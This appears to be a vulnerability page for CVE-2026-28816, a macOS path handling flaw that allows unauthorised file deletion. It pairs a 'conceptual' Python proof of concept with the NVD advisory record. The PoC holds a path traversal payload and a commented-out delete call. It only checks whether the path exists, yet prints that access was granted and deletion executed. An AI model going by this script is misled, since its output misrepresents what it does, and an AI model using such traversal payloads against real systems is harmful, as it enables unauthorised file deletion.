CVE-2026-28816

/* * PoC for CVE-2026-28816 (Conceptual) * This script demonstrates how a path handling issue might be exploited * to delete a file without proper permissions. */ import os # Target file that the app should not have access to target_file = "/private/system_sensitive_config.txt" # Exploit path handling logic (e.g., using symlink path traversal) # In a real scenario, the vulnerability would allow bypassing the check. malicious_path = "../../../../../../../private/system_sensitive_config.txt" try: # Simulating the vulnerable function if os.path.exists(malicious_path): print(f"[+] Access granted via path traversal: {malicious_path}") # os.remove(malicious_path) # Actual exploit action print("[!] File deletion attempt executed.") else: print("[-] Path not found.") except PermissionError: print("[-] Permission denied (Vulnerability not present or patched).") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-28816", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:06.870", "lastModified": "2026-03-26T17:19:57.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path handling issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.4. An app may be able to delete files for which it does not have permission."}, {"lang": "es", "value": "Se abordó un problema de manejo de rutas con validación mejorada. Este problema está solucionado en macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.4. Una aplicación podría eliminar archivos para los que no tiene permiso."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.5", "matchCriteriaId": "D66288AF-23BD-407A-81F5-F1DFBF84C622"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.5", "matchCriteriaId": "DD21D2C9-BBEC-4E8E-B8D2-C92B7E6155E1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126795", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126796", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}